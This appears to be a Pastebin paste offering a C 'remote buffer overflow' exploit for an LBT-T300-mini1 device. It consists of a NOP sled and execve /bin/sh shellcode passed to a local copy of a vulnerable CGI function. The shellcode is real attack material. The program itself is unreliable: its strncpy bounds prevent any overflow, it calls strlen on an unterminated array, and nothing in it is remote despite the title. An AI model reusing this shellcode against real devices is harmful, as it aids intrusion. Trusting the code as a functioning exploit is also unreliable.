Advertisement
FlyFar

LBT-T300-mini1 - Remote Buffer Overflow

Mar 27th, 2024
450
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 1.21 KB | Cybersecurity | 0 0
  1. #include <stdio.h>
  2. #include <string.h>
  3.  
  4. #define MAX_LEN 256
  5. #define BUFFER_OVERRUN_LENGTH 50
  6. #define SHELLCODE_LENGTH 32
  7.  
  8. // NOP sled to increase the chance of successful shellcode execution
  9. char nop_sled[SHELLCODE_LENGTH] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
  10.  
  11. // Shellcode to execute /bin/sh
  12. char shellcode[SHELLCODE_LENGTH] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
  13.  
  14. void apply_cgi(char *vpn_client_ip) {
  15.     char buffer[MAX_LEN];
  16.     strncpy(buffer, vpn_client_ip, MAX_LEN);
  17.     printf("Client IP: %s\n", buffer);
  18. }
  19.  
  20. int main() {
  21.     char input[MAX_LEN + BUFFER_OVERRUN_LENGTH] = {0};
  22.     // Create a buffer with the malicious input
  23.     // including the NOP sled, shellcode, and the overflow data
  24.     int offset = strlen(nop_sled) + strlen(shellcode) - BUFFER_OVERRUN_LENGTH;
  25.     strncpy(&input[0], nop_sled, offset);
  26.     strncpy(&input[offset], shellcode, SHELLCODE_LENGTH);
  27.     input[MAX_LEN + BUFFER_OVERRUN_LENGTH - 1] = '\x00';
  28.     // Call the vulnerable function to trigger the buffer overflow
  29.     apply_cgi(input);
  30.     return 0;
  31. }
  32.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement